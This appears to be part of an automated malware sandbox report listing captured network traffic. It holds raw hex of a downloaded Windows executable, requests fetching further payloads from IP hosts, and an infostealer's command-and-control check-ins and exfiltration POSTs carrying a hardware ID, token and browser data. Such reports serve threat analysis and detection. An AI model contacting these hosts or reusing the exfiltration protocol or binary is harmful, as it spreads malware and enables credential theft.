00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:25:22 GMTContent-Type: application/octet-streamContent-Length: 2814976Last-Modified: Sun, 24 Nov 2024 12:33:16 GMTConnection: keep-aliveETag: "67431d0c-2af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 63 6b 6e 6a 62 68 77 00 a0 2a 00 00 a0 00 00 00 94 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 7a 62 6a 6e 6c 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 ce 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 d2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:25:42 GMTContent-Type: application/octet-streamContent-Length: 2814976Last-Modified: Sun, 24 Nov 2024 12:33:16 GMTConnection: keep-aliveETag: "67431d0c-2af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 63 6b 6e 6a 62 68 77 00 a0 2a 00 00 a0 00 00 00 94 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 7a 62 6a 6e 6c 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 ce 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 d2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:28:55 GMTContent-Type: application/octet-streamContent-Length: 2814976Last-Modified: Sun, 24 Nov 2024 12:33:16 GMTConnection: keep-aliveETag: "67431d0c-2af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 63 6b 6e 6a 62 68 77 00 a0 2a 00 00 a0 00 00 00 94 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 7a 62 6a 6e 6c 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 ce 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 d2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 13:29:07 GMTContent-Type: application/octet-streamContent-Length: 2814976Last-Modified: Sun, 24 Nov 2024 12:33:16 GMTConnection: keep-aliveETag: "67431d0c-2af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 63 6b 6e 6a 62 68 77 00 a0 2a 00 00 a0 00 00 00 94 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 7a 62 6a 6e 6c 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 ce 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 d2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/6639161109/r5mqFEC.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008757001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008758001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008763001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008764001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 45 37 39 42 32 46 35 38 33 34 31 39 37 30 35 32 34 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 2d 2d 0d 0a Data Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="hwid"2682E79B2F583419705248------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="build"mars------FCFBGIDAEHCFIDGCBGII--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 35 36 62 30 32 35 32 62 62 32 61 63 32 35 32 30 62 38 31 30 63 37 64 65 63 39 35 65 34 32 30 39 63 61 66 35 37 64 31 66 66 34 35 33 39 63 64 64 34 66 30 64 30 39 35 36 31 31 62 32 37 62 31 37 35 38 36 31 38 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="token"c456b0252bb2ac2520b810c7dec95e4209caf57d1ff4539cdd4f0d095611b27b17586182------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="message"browsers------GHJDGDBFCBKFHJKFHCBK--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 35 36 62 30 32 35 32 62 62 32 61 63 32 35 32 30 62 38 31 30 63 37 64 65 63 39 35 65 34 32 30 39 63 61 66 35 37 64 31 66 66 34 35 33 39 63 64 64 34 66 30 64 30 39 35 36 31 31 62 32 37 62 31 37 35 38 36 31 38 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="token"c456b0252bb2ac2520b810c7dec95e4209caf57d1ff4539cdd4f0d095611b27b17586182------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="message"plugins------HIDBFCBGDBKKECBFCGIE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 35 36 62 30 32 35 32 62 62 32 61 63 32 35 32 30 62 38 31 30 63 37 64 65 63 39 35 65 34 32 30 39 63 61 66 35 37 64 31 66 66 34 35 33 39 63 64 64 34 66 30 64 30 39 35 36 31 31 62 32 37 62 31 37 35 38 36 31 38 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"c456b0252bb2ac2520b810c7dec95e4209caf57d1ff4539cdd4f0d095611b27b17586182------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="message"fplugins------FCBAEHCAEGDHJKFHJKFI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAEHost: 185.215.113.206Content-Length: 6103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008765001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 37 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008766001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
